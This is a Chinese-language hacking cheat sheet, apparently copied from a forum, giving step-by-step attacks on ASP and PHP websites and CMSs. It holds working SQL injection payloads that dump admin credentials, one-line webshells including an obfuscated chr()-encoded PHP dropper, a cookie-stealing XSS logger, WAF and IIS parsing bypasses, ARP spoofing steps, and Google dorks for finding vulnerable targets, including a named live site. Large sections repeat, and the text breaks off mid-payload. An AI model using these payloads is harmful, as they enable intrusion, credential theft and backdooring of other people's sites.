【 arp欺骗 】
只要该服务器存在C段,都可以尝试arp欺骗,用到的工具是NetFuke,想知道arp劫持能不能成功,cmd命令:arp -a 看一下,动态的服务器IP就能成功,静态的就不能。
安装完运行主控端,设置--嗅探设置--网卡选择服务器的IP--控制选项选择“启用ARP欺骗、启用过滤器、启用分析器、启用修改器、主动转发” 确定。
设置--ARP欺骗--双向欺骗--来源Ip填服务器的网关--中间人IP填服务器的IP--目标IP填要欺骗的任意C段ip(用御剑扫描C段)--确定。
插件管理--修改器--最后一个选项双击--在右边的HTML Body = [haha!!] 填写自己要展现的文字,点击开始即可欺骗成功!
=============================================================================================================================================================
【 突破安全狗防注入及上传 】
写入webshell 写不进去,平常的一句话 也失效,用这段代码:
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>
连接端用cncert的aspx一句话客户端
2、IIS6.0解析漏洞遇到安全狗
文件名为
这样的会被IIS安全狗果断屏蔽
改成如下名称,IIS6一样会解析:
http://www.baicai.com/;1.asp;1.jpg
3、安全狗的注入绕过
常用的如baicai.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但这样就可以突破了:
baicai.asp?0day5.com=%00.&id=69%20 and 1=1
=============================================================================================================================================================
【 跨站xss 】
在网站留言或者能输入信息的地方提交跨站代码,从而盗取管理员cookie,然后用cookie浏览器直接进入后台,将以下代码保存为asp文件,例如1.asp
<%
thisfile=Server.MapPath("cookie.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(thisfile,8,True,0)
thisfile.WriteLine("=======cookie:"&msg&"======by:剑眉大侠")
thisfile.close
set fs=nothing
%>
首先搭建一个asp环境,推荐使用“ASP服务器(摆脱安装IIS)” 再将1.asp放在wwwroot目录下,访问1.asp文件如果提示下载,则说明搭建成功了。
然后在留言板的“您的网站”一处输入:<script>doucument.location=*http://127.0.0.1/1.asp?msg=*document.cookie</script>
当管理员浏览我们提交的留言时,将在wwwroot目录下生成一个cookie.txt文件,这时我们只要访问cookie.txt这个文件,就能知道管理员的cookie是多少了!
然后再使用桂林老兵的cookie欺骗工具或是网页源代码查看分析器,访问网站再输入cookie进行欺骗登录即可!(填cookei的时候记得选择自定义)
小技巧:要想让管理员早点浏览你提交的留言,可以通过打电话,QQ客服等去社工他即可。
只要该服务器存在C段,都可以尝试arp欺骗,用到的工具是NetFuke,想知道arp劫持能不能成功,cmd命令:arp -a 看一下,动态的服务器IP就能成功,静态的就不能。
安装完运行主控端,设置--嗅探设置--网卡选择服务器的IP--控制选项选择“启用ARP欺骗、启用过滤器、启用分析器、启用修改器、主动转发” 确定。
设置--ARP欺骗--双向欺骗--来源Ip填服务器的网关--中间人IP填服务器的IP--目标IP填要欺骗的任意C段ip(用御剑扫描C段)--确定。
插件管理--修改器--最后一个选项双击--在右边的HTML Body = [haha!!] 填写自己要展现的文字,点击开始即可欺骗成功!
=============================================================================================================================================================
【 突破安全狗防注入及上传 】
写入webshell 写不进去,平常的一句话 也失效,用这段代码:
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>
连接端用cncert的aspx一句话客户端
2、IIS6.0解析漏洞遇到安全狗
文件名为
这样的会被IIS安全狗果断屏蔽
改成如下名称,IIS6一样会解析:
http://www.baicai.com/;1.asp;1.jpg
3、安全狗的注入绕过
常用的如baicai.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但这样就可以突破了:
baicai.asp?0day5.com=%00.&id=69%20 and 1=1
=============================================================================================================================================================
【 跨站xss 】
在网站留言或者能输入信息的地方提交跨站代码,从而盗取管理员cookie,然后用cookie浏览器直接进入后台,将以下代码保存为asp文件,例如1.asp
<%
thisfile=Server.MapPath("cookie.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(thisfile,8,True,0)
thisfile.WriteLine("=======cookie:"&msg&"======by:剑眉大侠")
thisfile.close
set fs=nothing
%>
首先搭建一个asp环境,推荐使用“ASP服务器(摆脱安装IIS)” 再将1.asp放在wwwroot目录下,访问1.asp文件如果提示下载,则说明搭建成功了。
然后在留言板的“您的网站”一处输入:<script>doucument.location=*http://127.0.0.1/1.asp?msg=*document.cookie</script>
当管理员浏览我们提交的留言时,将在wwwroot目录下生成一个cookie.txt文件,这时我们只要访问cookie.txt这个文件,就能知道管理员的cookie是多少了!
然后再使用桂林老兵的cookie欺骗工具或是网页源代码查看分析器,访问网站再输入cookie进行欺骗登录即可!(填cookei的时候记得选择自定义)
小技巧:要想让管理员早点浏览你提交的留言,可以通过打电话,QQ客服等去社工他即可。
【 爆库 】
%5C为十六进制的\符号,而数据库大于5.0就可以爆库,若一个网站数据库大于5.0,且是ACESS数据库,若不能注入的注入点是:http://www.xxx.com/rpc/show24.asp?id=127
我们直接把%5C加到rpc后面,因为%5C是爆二级目录,所以应该是这样,http://www.xxx.com/rpc%5c/show24.asp?id=127
而%23是代表#,如果管理员为了防止他人非法下载数据库,而把数据库改成#database.mdb,这样防止了。
如果页面地址为:http://www.xx.com/rpd/#database.mdb ; 把%23替换#就可以下载了,即:http://www.xx.com/rpd/%23database.mdb
还有利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径,也可以得到数据库的路径(注意:这里的/也要换成%5c)
如果你能看到:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
=============================================================================================================================================================
【 利用sql注入点判断网站和数据库是否站库分离 】
在注入点后加上:and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end)))
注意admin一定要是存在的表段,如果返回正常,说明网站和数据库是在同一服务器,如果不正常则说明是站库分离的。
=============================================================================================================================================================
【 iis6.0 PUT写入漏洞 】
利用工具:IIS PUT Scaner、桂林老兵IIS写权限利用程序
1、IIS来宾用户对网站文件夹有写入权限
2、web服务器扩展力设置webDAV为允许,即:WebDAV—打勾
3、网站主目录:写入—打勾(可PUT)
4、网站主目录:脚本资源访问—打勾(可COPY、MOVE)
大家都清楚,写权限就是允许PUT,与网站自身运行的权限无丝毫联系,如果开启了,就是没有一点安全意识,就给我们提供了大大的方便。
首先用御剑工具扫下C段,比如:12.12.12.1 - 12.12.12.255 打开IIS PUT Scaner,把12.12.12.1放在Start IP 这里,12.12.12.255放在End IP 这里,
接着在Port这里,换成80,点击Scan开始嗅探,当PUT这里显示是Yes就说明存在漏洞,可以右键选择PUT file,输入文件名1.txt,下面填内容,保存就可以写入了。
或是利用“桂林老兵IIS写权限利用程序”也可以,这款工具比较强大,把域名填写进去,例如:http://www.xxx.com,然后在请求文件那里输入你的文件名,
在数据包格式那里选择PUT,有的会直接弹出浏览文件框,没有就自己选择,在下面,然后点击提交数据库即可,一般是先PUT一个txt文件,再MOVE成asp木马。
直接提交asp木马的话,如果MOVE方法不行,可以试试Copy。
%5C为十六进制的\符号,而数据库大于5.0就可以爆库,若一个网站数据库大于5.0,且是ACESS数据库,若不能注入的注入点是:http://www.xxx.com/rpc/show24.asp?id=127
我们直接把%5C加到rpc后面,因为%5C是爆二级目录,所以应该是这样,http://www.xxx.com/rpc%5c/show24.asp?id=127
而%23是代表#,如果管理员为了防止他人非法下载数据库,而把数据库改成#database.mdb,这样防止了。
如果页面地址为:http://www.xx.com/rpd/#database.mdb ; 把%23替换#就可以下载了,即:http://www.xx.com/rpd/%23database.mdb
还有利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径,也可以得到数据库的路径(注意:这里的/也要换成%5c)
如果你能看到:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
=============================================================================================================================================================
【 利用sql注入点判断网站和数据库是否站库分离 】
在注入点后加上:and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end)))
注意admin一定要是存在的表段,如果返回正常,说明网站和数据库是在同一服务器,如果不正常则说明是站库分离的。
=============================================================================================================================================================
【 iis6.0 PUT写入漏洞 】
利用工具:IIS PUT Scaner、桂林老兵IIS写权限利用程序
1、IIS来宾用户对网站文件夹有写入权限
2、web服务器扩展力设置webDAV为允许,即:WebDAV—打勾
3、网站主目录:写入—打勾(可PUT)
4、网站主目录:脚本资源访问—打勾(可COPY、MOVE)
大家都清楚,写权限就是允许PUT,与网站自身运行的权限无丝毫联系,如果开启了,就是没有一点安全意识,就给我们提供了大大的方便。
首先用御剑工具扫下C段,比如:12.12.12.1 - 12.12.12.255 打开IIS PUT Scaner,把12.12.12.1放在Start IP 这里,12.12.12.255放在End IP 这里,
接着在Port这里,换成80,点击Scan开始嗅探,当PUT这里显示是Yes就说明存在漏洞,可以右键选择PUT file,输入文件名1.txt,下面填内容,保存就可以写入了。
或是利用“桂林老兵IIS写权限利用程序”也可以,这款工具比较强大,把域名填写进去,例如:http://www.xxx.com,然后在请求文件那里输入你的文件名,
在数据包格式那里选择PUT,有的会直接弹出浏览文件框,没有就自己选择,在下面,然后点击提交数据库即可,一般是先PUT一个txt文件,再MOVE成asp木马。
直接提交asp木马的话,如果MOVE方法不行,可以试试Copy。
【 ACCESS执行SQL语句导出一句话拿webshell 】
原理大致和php网站的outfile差不多,在access后台其他方法不能拿到webshell,但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了。
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式,我们导出为EXCEL后在利用IIS解析漏洞就可以变成我们的木马了。
点“服务器信息探测”,获得网站路径:e:\web\webshellcc\的EXCEL 点“系统管理”-》“自定义执行SQL”,试一下,能够执行的话可以用access导一句话拿下shell。
create table cmd (a varchar(50)) 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
insert into cmd (a) values (*<%execute request(chr(35))%>*) 在表cmd的a字段插入密码为#的一句话木马
select * into [a] in *e:\web\webshellcc\1.asa;x.xls* *excel 4.0;* from cmd 把cmd表a的内容导出到路径e:\web\webshellcc\的EXCEL文件
drop table cmd 删除建立的cmd表
菜刀连接:http://www.xxx.com/1.asa;x.xls
=============================================================================================================================================================
【 利用过滤*or*=*or*修改代码进行绕过 】
例如后台地址是:http://www.hdminc.net/admin/admin_index.asp
当用万能密码登录的时候,会出现一些过滤or的提示!
请右键查看源文件,另存为桌面 XX.html,然后打开找到以下这段代码,进行删除!
<script language="javascript">
function chencklogin()
{
if(document.login.username.value==**)
{alert(*请输入用户名*);
document.login.username.focus();
return false
}
if (document.login.password.value==**)
{alert(*请输入密码*);
document.login.password.focus();
return false
}
}
</script>
注意:将以下段代码中的 "index.asp?action=chkadmin" 修改为 "http://www.hdminc.net/admin/admin_index.asp"
<form action="index.asp?action=chkadmin" name="login" method="past" onsubmit=return checklogin();">
最后保存打开,再用*or*=*or*登录时,系统已不再过滤,结果就能用万能密码登录进去了!
=============================================================================================================================================================
【 动力3.5拿shell 】
inurl:printpage.asp?ArticleID=
1.找到版权信息,把内容替换成:
版权所有 Copyright? 2003 <a href=*http://www.asp163.net*>动力空间</a>" *版权信息
if Request("xiaoxin")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "小新恭喜"
end if
Response.write "<form method=*POST*action=*"&Request.ServerVariables("URL")&"?xiaoxin=520&creat=yes*>"
Response.write "<textarea name=*text*>"&thisline&"</textarea><br>"
Response.write "<input type=*text* name=*path* value=*"&Request("path")&"*>"
Response.write "<input name=*submit* type=*submit* value=*ok* ></form>"
Response.end
end if
%>
2.然后保存,千万别跳转任何页面,直接在IE地址栏内将 admin/Admin_Login.asp 替换成 inc/config.asp?xiaoxin=520
3.成功后会进入一个像小马一样的页面,粘贴木马代码以及写上木马文件名即可拿到wshell,木马在inc目录。
原理大致和php网站的outfile差不多,在access后台其他方法不能拿到webshell,但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了。
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式,我们导出为EXCEL后在利用IIS解析漏洞就可以变成我们的木马了。
点“服务器信息探测”,获得网站路径:e:\web\webshellcc\的EXCEL 点“系统管理”-》“自定义执行SQL”,试一下,能够执行的话可以用access导一句话拿下shell。
create table cmd (a varchar(50)) 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
insert into cmd (a) values (*<%execute request(chr(35))%>*) 在表cmd的a字段插入密码为#的一句话木马
select * into [a] in *e:\web\webshellcc\1.asa;x.xls* *excel 4.0;* from cmd 把cmd表a的内容导出到路径e:\web\webshellcc\的EXCEL文件
drop table cmd 删除建立的cmd表
菜刀连接:http://www.xxx.com/1.asa;x.xls
=============================================================================================================================================================
【 利用过滤*or*=*or*修改代码进行绕过 】
例如后台地址是:http://www.hdminc.net/admin/admin_index.asp
当用万能密码登录的时候,会出现一些过滤or的提示!
请右键查看源文件,另存为桌面 XX.html,然后打开找到以下这段代码,进行删除!
<script language="javascript">
function chencklogin()
{
if(document.login.username.value==**)
{alert(*请输入用户名*);
document.login.username.focus();
return false
}
if (document.login.password.value==**)
{alert(*请输入密码*);
document.login.password.focus();
return false
}
}
</script>
注意:将以下段代码中的 "index.asp?action=chkadmin" 修改为 "http://www.hdminc.net/admin/admin_index.asp"
<form action="index.asp?action=chkadmin" name="login" method="past" onsubmit=return checklogin();">
最后保存打开,再用*or*=*or*登录时,系统已不再过滤,结果就能用万能密码登录进去了!
=============================================================================================================================================================
【 动力3.5拿shell 】
inurl:printpage.asp?ArticleID=
1.找到版权信息,把内容替换成:
版权所有 Copyright? 2003 <a href=*http://www.asp163.net*>动力空间</a>" *版权信息
if Request("xiaoxin")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "小新恭喜"
end if
Response.write "<form method=*POST*action=*"&Request.ServerVariables("URL")&"?xiaoxin=520&creat=yes*>"
Response.write "<textarea name=*text*>"&thisline&"</textarea><br>"
Response.write "<input type=*text* name=*path* value=*"&Request("path")&"*>"
Response.write "<input name=*submit* type=*submit* value=*ok* ></form>"
Response.end
end if
%>
2.然后保存,千万别跳转任何页面,直接在IE地址栏内将 admin/Admin_Login.asp 替换成 inc/config.asp?xiaoxin=520
3.成功后会进入一个像小马一样的页面,粘贴木马代码以及写上木马文件名即可拿到wshell,木马在inc目录。
【 动易cms拿shell 】
点击网站配置,在网站名称后面插入一句话木马,连接inc/config.asp
=============================================================================================================================================================
【 aspcms】
简要描述:后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。
爆帐号密码:
admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1
版本不同需要更改值。
第二种方法,找到后台,然后/admin/_system/AspCms_SiteSetting.asp?action=saves
直接POST
[php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0
&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&
waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn
&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1
&LanguageID=1[/php]
再连接配置文件config.asp 密码为#
老版本中可以通过添加模板直接添加asp.但是新版已经限制了添加模板的格式为html,js,css
当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.
方法:点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,文件内容写一句话<%eval request(“g”)%>
然后添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话了,用菜刀连接即可!
可是如果遇到iis7.5呢? 以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.
1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”
2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了,将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%
3、一句话木马,密码a。在/config/AspCms_Config.asp
点击网站配置,在网站名称后面插入一句话木马,连接inc/config.asp
=============================================================================================================================================================
【 aspcms】
简要描述:后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。
爆帐号密码:
admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1
版本不同需要更改值。
第二种方法,找到后台,然后/admin/_system/AspCms_SiteSetting.asp?action=saves
直接POST
[php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0
&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&
waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn
&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1
&LanguageID=1[/php]
再连接配置文件config.asp 密码为#
老版本中可以通过添加模板直接添加asp.但是新版已经限制了添加模板的格式为html,js,css
当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.
方法:点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,文件内容写一句话<%eval request(“g”)%>
然后添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话了,用菜刀连接即可!
可是如果遇到iis7.5呢? 以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.
1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”
2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了,将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%
3、一句话木马,密码a。在/config/AspCms_Config.asp
【 XYCMS企业建站系统 】
关键词:inurl:showkbxx.asp?id=
默认数据库:data/xy#!123.mdb
默认账户密码:admin admin
找到网站配置,在网站名称里面直接插入一句话:网站"%><%eval request("x")%><%*,注意不要删掉网站名称!然后中国菜刀连接:/inc/config.asp
或是找到网站地址,在http://后面加上一句话木马,然后菜刀链接配置文件:inc/config.asp
=============================================================================================================================================================
【 szwyadmin漏洞绕过后台验证 】
关键字:inurl:szwyadmin/login.asp
javascript:alert(document.cookie="adminuser="+escape("*or*=*or*"));javascript:alert(document.cookie="adminpass="+escape("*or*=*or*"));javascript:alert(document.cookie="admindj="+escape("1"));
1.后台一般存在一个szwyadmin文件夹,复制一下后台地址放在一边,之后复制代码替换后台地址访问进行注射!
2.这时会弹出一个窗口,连续点击三次确定。
3.重新访问后台地址,把网站后面的/login.asp 换成 admin_index.asp 奇迹般的直接进入后台了!
=============================================================================================================================================================
【 医院建站系统任意文件上传漏洞 】
关键词:inurl:cms/Column.aspx?
关键词:inurl:cms/Column.aspx?LMID=
漏洞利用 :xtwh/upfile.aspx
直接上传aspx木马拿shell。
=============================================================================================================================================================
【 Struts 2远程执行命令漏洞 】
】
struts 2一种java-web的MVC框架技术,和传统的struts1有很大的改进。
严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。
关键词:inurl:common/common_info.action?wid=
http://www.xxxxx.com/xxx.action 一般页面以.action结尾的几乎都存在这个漏洞,可以用工具检测一下就知道了。
这个漏洞是在Java运行环境下利用的,Java运行环境下载地址:http://www.orsoon.com/Soft/12080.html
=============================================================================================================================================================
【 嘉友科技cms上传漏洞 】
谷歌关键字:inurl:newslist.asp?NodeCode=
程序采用的上传页uploadfile.asp未进行管理验证,导致建立畸形目录上传图片木马获取shell漏洞。
exp:ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
他原上传目录是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
而且他的上传文件没有过滤导致未授权访问,直接上传小马,然后小马后面写为1.jpg 访问路径 查看源代码。
=============================================================================================================================================================
【 ecshopcms后台拿shell 】
支持最新2.7.2版本,通杀最新版本后台低权限!
<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr(75).chr(33); @fclose($fp); ?>
后台-订单管理-订单打印-选择源代码编辑-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,一句话密码:usb
=============================================================================================================================================================
【 phpcms2008版本 直接执行php代码漏洞 】
关键字:inurl:yp/product.php
exp代码:pagesize=${${@eval_r($_POST[cmd])}}
测试网站:http://www.slsdgc.com.cn/yp/product.php?catid=721
利用方法:http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}
菜刀连接:http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}} 密码cmd
菜刀连接注意以下格式:
默认级别 php gb2312
=============================================================================================================================================================
【 教育站sql注入通杀0day 】
关键词:inurl:info_Print.asp?ArticleID=
默认后台:website/ad_login.asp
比如:http://www.psfshl.pudong-edu.sh.asp?ArticleID=1650
加上:union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
这样就直接得到了管理员账户和经过Md5加密的密码了。
=============================================================================================================================================================
【 IIS7.0 畸形解析漏洞通杀oday 】
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP一句话图片木马缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php xx随便你怎么填,只要后缀为.php就好,之后菜刀连接即可!
关键词:inurl:showkbxx.asp?id=
默认数据库:data/xy#!123.mdb
默认账户密码:admin admin
找到网站配置,在网站名称里面直接插入一句话:网站"%><%eval request("x")%><%*,注意不要删掉网站名称!然后中国菜刀连接:/inc/config.asp
或是找到网站地址,在http://后面加上一句话木马,然后菜刀链接配置文件:inc/config.asp
=============================================================================================================================================================
【 szwyadmin漏洞绕过后台验证 】
关键字:inurl:szwyadmin/login.asp
javascript:alert(document.cookie="adminuser="+escape("*or*=*or*"));javascript:alert(document.cookie="adminpass="+escape("*or*=*or*"));javascript:alert(document.cookie="admindj="+escape("1"));
1.后台一般存在一个szwyadmin文件夹,复制一下后台地址放在一边,之后复制代码替换后台地址访问进行注射!
2.这时会弹出一个窗口,连续点击三次确定。
3.重新访问后台地址,把网站后面的/login.asp 换成 admin_index.asp 奇迹般的直接进入后台了!
=============================================================================================================================================================
【 医院建站系统任意文件上传漏洞 】
关键词:inurl:cms/Column.aspx?
关键词:inurl:cms/Column.aspx?LMID=
漏洞利用 :xtwh/upfile.aspx
直接上传aspx木马拿shell。
=============================================================================================================================================================
【 Struts 2远程执行命令漏洞 】
】
struts 2一种java-web的MVC框架技术,和传统的struts1有很大的改进。
严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。
关键词:inurl:common/common_info.action?wid=
http://www.xxxxx.com/xxx.action 一般页面以.action结尾的几乎都存在这个漏洞,可以用工具检测一下就知道了。
这个漏洞是在Java运行环境下利用的,Java运行环境下载地址:http://www.orsoon.com/Soft/12080.html
=============================================================================================================================================================
【 嘉友科技cms上传漏洞 】
谷歌关键字:inurl:newslist.asp?NodeCode=
程序采用的上传页uploadfile.asp未进行管理验证,导致建立畸形目录上传图片木马获取shell漏洞。
exp:ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
他原上传目录是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
而且他的上传文件没有过滤导致未授权访问,直接上传小马,然后小马后面写为1.jpg 访问路径 查看源代码。
=============================================================================================================================================================
【 ecshopcms后台拿shell 】
支持最新2.7.2版本,通杀最新版本后台低权限!
<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr(75).chr(33); @fclose($fp); ?>
后台-订单管理-订单打印-选择源代码编辑-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,一句话密码:usb
=============================================================================================================================================================
【 phpcms2008版本 直接执行php代码漏洞 】
关键字:inurl:yp/product.php
exp代码:pagesize=${${@eval_r($_POST[cmd])}}
测试网站:http://www.slsdgc.com.cn/yp/product.php?catid=721
利用方法:http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}
菜刀连接:http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}} 密码cmd
菜刀连接注意以下格式:
默认级别 php gb2312
=============================================================================================================================================================
【 教育站sql注入通杀0day 】
关键词:inurl:info_Print.asp?ArticleID=
默认后台:website/ad_login.asp
比如:http://www.psfshl.pudong-edu.sh.asp?ArticleID=1650
加上:union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
这样就直接得到了管理员账户和经过Md5加密的密码了。
=============================================================================================================================================================
【 IIS7.0 畸形解析漏洞通杀oday 】
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP一句话图片木马缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php xx随便你怎么填,只要后缀为.php就好,之后菜刀连接即可!
【 ecshop漏洞总汇 】
关键字:powered by ecshop
普通代码:user.php?act=order_query&order_sn=* union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
变种代码:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
直接在网站后台加入代码回车就能爆出帐号密码,再去掉代码加上/admin回车就能直接进后台了。
拿shell方法很简单,找到“库项目管理”再选择“配送的方式”,在代码最下面插入php一句话木马:<?php eval($_POST[x]);?> 不行就换php木马的预代码!
接着保存,一句话路径是:http://www.xxx.org/myship.php ; 打开“ASP+PHP两用Shell.html”填入地址,点击一下环境变量,成功之后点击上传文件就可以拿shell了。
=============================================================================================================================================================
【 ESPCMS通杀0day 】
关键字:inurl:index.php?ac=article&at=read&did=
默认后台:adminsoft/index.php 或者 admin/
注入点(爆表前缀,比如:cm_admin......前缀就是cm,后面3个代码要自行替换):
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密码:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((sele
关键字:powered by ecshop
普通代码:user.php?act=order_query&order_sn=* union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
